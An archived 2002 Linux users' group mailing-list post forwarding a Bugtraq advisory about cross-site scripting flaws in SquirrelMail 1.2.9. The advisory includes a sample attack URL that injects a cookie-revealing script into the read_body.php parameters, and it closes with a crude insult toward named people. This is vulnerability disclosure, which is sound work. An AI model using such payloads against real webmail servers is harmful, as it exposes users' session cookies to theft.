l i n u x - u s e r s - g r o u p - o f - d a v i s
L U G O D
 
Next Meeting:
October 7: Social gathering
Next Installfest:
TBD
Latest News:
Aug. 18: Discounts to "Velocity" in NY; come to tonight's "Photography" talk
Page last updated:
2002 Dec 03 17:59

The following is an archive of a post made to our 'vox mailing list' by one of its subscribers.

Report this post as spam:

(Enter your email address)
[vox] [Fwd: SquirrelMail v1.2.9 XSS bugs]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[vox] [Fwd: SquirrelMail v1.2.9 XSS bugs]



I know I am not the only user on these lists using SM. If you are, you may
wanto to examine an update to 1.2.10 - though, tha authors of this
security announcement state they do not know if this security hole works
against 1.2.10 yet.

If you are the only one to use SM on your box, consider putting it behind
an ssl based, basic-auth dir so that it is not easy for non-authenticated
users to try to run an exploit r steal a password from a user who has
access to a SM account to perform an exploit.

Enjoy...
-ME
-- 
-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GCS/CM$/IT$/LS$/S/O$ !d--(  ) !s !a   (-----) C  $(    ) U    $( $) P $>
L   $(  ) E W   $( ) N  o K w $>  >    O-@ M $ V-$>- !PS !PE Y  PGP
t@-(  ) 5 @ X@ R- tv- b   DI    D  G--@ e >  >     h(  )>  r*>? z?
------END GEEK CODE BLOCK------
decode: http://www.ebb.org/ungeek/ about: http://www.geekcode.com/geek.html
  Campus IT(/OS Security): Operating Systems Support Specialist Assistant


-------- Original Message --------
Subject: SquirrelMail v1.2.9 XSS bugs
From: "euronymous" <just-a-user@yandex.ru>
Date: Mon, December 2, 2002 8:28 pm
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org

=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: SquirrelMail v1.2.9 XSS bugs
product: SquirrelMail v1.2.9
vendor: www.squirrelmail.org
risk: low
date: 12/3/2k2
discovered by: euronymous /F0KP /HACKRU Team
advisory url: http://f0kp.iplus.ru/bz/008.txt
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=

description
-----------
when reading some email you can to insert the scripting code..
read_body.php dont make filtering users input in `mailbox' and
`passed_id' variables. btw, today has released v1.2.10. im dont
know if this version contains this xss.

sample attack
-------------
http://hostname/src/read_body.php?mailbox=
%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&passed_id=
%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&
startMessage=1&show_more=0

[it must be in a single string]

not URL-encoded string working fine also.

shouts: HACKRU Team, DWC, DHG, Spoofed Packet, all
russian security guyz!!
fuck_off: slavomira and other dirty ppl in *.kz

================
im not a lame,
not yet a hacker
================



_______________________________________________
vox mailing list
vox@lists.lugod.org
http://lists.lugod.org/mailman/listinfo/vox



LinkedIn
LUGOD Group on LinkedIn
Sign up for LUGOD event announcements
Your email address:
facebook
LUGOD Group on Facebook
'Like' LUGOD on Facebook:

Hosting provided by:
Sunset Systems
Sunset Systems offers preconfigured Linux systems, remote system administration and custom software development.

LUGOD: Linux Users' Group of Davis
PO Box 2082, Davis, CA 95617
Contact Us

LUGOD is a 501(c)7 non-profit organization
based in Davis, California
and serving the Sacramento area.
"Linux" is a trademark of Linus Torvalds.

Sponsored in part by:
EDGE Tech Corp.
For donating some give-aways for our meetings.